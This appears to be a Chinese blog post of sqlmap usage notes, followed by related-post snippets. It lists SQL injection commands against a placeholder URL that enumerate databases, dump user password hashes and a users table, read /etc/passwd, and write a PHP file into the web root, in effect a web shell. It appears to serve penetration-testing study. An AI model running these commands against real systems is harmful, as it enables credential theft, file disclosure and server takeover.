sqlmap使用筆記

2022-05-09 17:52:22 字數 1116 閱讀 1918

收藏:

以前整理的 方便查閱 有錯誤的指出順便注:文中部分是– 而不是—— (這個不是我不願意修改,而是**系統的問題,實在抱歉,請大家在複製語句之後手工修改。:) )

簡單的注入流程

1.讀取資料庫版本,當前使用者,當前資料庫

sqlmap -u test.php?p=2 -f -b –current-user –current-db -v 1

2.判斷當前資料庫使用者許可權

sqlmap -u test.php?p=2 –privileges -u 使用者名稱 -v 1

sqlmap -u test.php?p=2 –is-dba -u 使用者名稱 -v 1

3.讀取所有資料庫使用者或指定資料庫使用者的密碼

sqlmap -u test.php?p=2 –users –passwords -v 2

sqlmap -u test.php?p=2 –passwords -u root -v 2

4.獲取所有資料庫

sqlmap -u test.php?p=2 –dbs -v 2

5.獲取指定資料庫中的所有表

sqlmap -u test.php?p=2 –tables -d mysql -v 2

6.獲取指定資料庫名中指定表的字段

sqlmap -u test.php?p=2 –columns -d mysql -t users -v 2

7.獲取指定資料庫名中指定表中指定欄位的資料

sqlmap -u test.php?p=2 –dump -d mysql -t users -c 「username,password」 -s 「sqlnmapdb.log」 -v 2

8.file-read讀取web檔案

sqlmap -u test.php?p=2 –file-read 「/etc/passwd」 -v 2

9.file-write寫入檔案到web

sqlmap -u test.php?p=2 –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2

本文**bugcx blog 由網路安全攻防研究室(www.91ri.org)資訊保安小組收集整理。

sqlmap使用筆記

中文使用說明 sqlmap是一種開源的滲透測試工具,可以自動檢測和利用sql注入漏洞以及接入該資料庫的伺服器。它擁有非常強大的檢測引擎 具有多種特性的滲透測試器 通過資料庫指紋提取訪問底層檔案系統並通過外帶連線執行命令。支援的資料庫 mysql,oracle,postgresql,microsoft...

sqlmap使用筆記

sqlmap使用筆記 簡單的注入流程 1.讀取資料庫版本,當前使用者,當前資料庫 sqlmap u test.php?p 2 f b current user current db v 1 2.判斷當前資料庫使用者許可權 sqlmap u test.php?p 2 privileges u 使用者名...

Vim 使用筆記

set hlsearch set nohlsearch 搜尋後清除上次的加亮 nohl nohlsearch 拷貝 很有用的一句話,規定了格式選項,讓它換行不自動空格 set formatoptions tcrqn set fo r set noautoindent 再 shift insert 正...